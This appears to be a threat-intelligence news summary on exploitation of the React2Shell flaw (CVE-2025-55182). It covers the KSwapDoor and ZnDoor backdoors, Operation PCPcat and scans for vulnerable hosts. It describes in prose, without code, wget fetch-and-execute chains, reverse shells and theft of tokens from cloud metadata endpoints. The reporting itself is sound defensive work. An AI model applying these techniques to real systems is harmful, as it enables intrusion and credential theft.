Key Takeaways:
- The React2Shell vulnerability is being exploited by threat actors to deliver malware families like KSwapDoor and ZnDoor.
- KSwapDoor is a professionally engineered remote access tool that builds an internal mesh network, allowing compromised servers to talk to each other and evade security blocks.
- The vulnerability has been exploited by multiple threat actors, including at least five China-nexus groups, to deliver an array of payloads.
- The attacks are characterized by the use of Cloudflare Tunnel endpoints to evade security defenses and conducting reconnaissance of the compromised environments to facilitate lateral movement and credential theft.
- The credential harvesting activity targets Azure Instance Metadata Service (IMDS) endpoints for Azure, Amazon Web Services (AWS), Google Cloud Platform (GCP), and Tencent Cloud.
Introduction to React2Shell
The security vulnerability known as React2Shell is being exploited by threat actors to deliver malware families like KSwapDoor and ZnDoor, according to findings from Palo Alto Networks Unit 42 and NTT Security. This vulnerability is a significant concern for organizations, as it allows attackers to gain unauthorized access to sensitive data and systems. KSwapDoor, in particular, is a professionally engineered remote access tool designed with stealth in mind, allowing compromised servers to communicate with each other and evade security blocks.
KSwapDoor Malware
KSwapDoor is a sophisticated malware that builds an internal mesh network, enabling compromised servers to talk to each other and evade security blocks. It uses military-grade encryption to hide its communications and features a "sleeper" mode that lets attackers bypass firewalls by waking the malware up with a secret, invisible signal. This malware also impersonates a legitimate Linux kernel swap daemon to evade detection, making it challenging for security teams to identify and mitigate the threat. The Linux backdoor offers interactive shell, command execution, file operations, and lateral movement scanning capabilities, allowing attackers to gain full control over the compromised systems.
Exploitation of React2Shell
In a related development, NTT Security said organizations in Japan are being targeted by cyber attacks exploiting React2Shell to deploy ZnDoor, a malware that’s been assessed to be detected in the wild since December 2023. The attack chains involve running a bash command to fetch the payload from a remote server using wget and executing it. ZnDoor is a remote access trojan that contacts the same threat actor-controlled infrastructure to receive commands and execute them on the host. Some of the supported commands include shell, interactive_shell, explorer, explorer_cat, explorer_delete, explorer_upload, explorer_download, system, change_timefile, socket_quick_startstreams, start_in_port_forward, and stop_in_port.
CVE-2025-55182 Vulnerability
The disclosure comes as the vulnerability, tracked as CVE-2025-55182 (CVSS score: 10.0), has been exploited by multiple threat actors, including at least five China-nexus groups, to deliver an array of payloads. Google has identified these groups, which have weaponized the vulnerability to deliver various malware, including tunneling utilities, downloaders, backdoors, and remote access trojans. Microsoft, in its own advisory for CVE-2025-55182, said threat actors have taken advantage of the flaw to run arbitrary commands for post-exploitation, including setting up reverse shells to known Cobalt Strike servers, and then dropping remote monitoring and management (RMM) tools.
Attack Characteristics
The attacks are characterized by the use of Cloudflare Tunnel endpoints to evade security defenses and conducting reconnaissance of the compromised environments to facilitate lateral movement and credential theft. The credential harvesting activity targets Azure Instance Metadata Service (IMDS) endpoints for Azure, Amazon Web Services (AWS), Google Cloud Platform (GCP), and Tencent Cloud, with the end goal of acquiring identity tokens to burrow deeper into cloud infrastructures. Attackers also deployed secret discovery tools, such as TruffleHog and Gitleaks, along with custom scripts to extract several different secrets, including AI and cloud-native credentials.
Operation PCPcat
In another campaign detailed by Beelzebub, threat actors have been observed exploiting flaws in Next.js, including CVE-2025-29927 and CVE-2025-66478, to enable systematic extraction of credentials and sensitive data. The malware proceeds to create persistence on the host to survive system reboots, install a SOCKS5 proxy, establish a reverse shell, and install a React scanner to probe the internet for further propagation. The activity, codenamed Operation PCPcat, is estimated to have already breached 59,128 servers, showing characteristics of large-scale intelligence operations and data exfiltration on an industrial scale.
Vulnerability Tracking
The Shadowserver Foundation is currently tracking over 111,000 IP addresses vulnerable to React2Shell attacks, with over 77,800 instances in the U.S., followed by Germany, France, and India. Data from GreyNoise shows that there are 547 malicious IP addresses from the U.S., India, the U.K., Singapore, and the Netherlands partaking in the exploitation efforts over the past 24 hours. This highlights the widespread nature of the vulnerability and the need for organizations to take immediate action to patch and protect their systems from these attacks.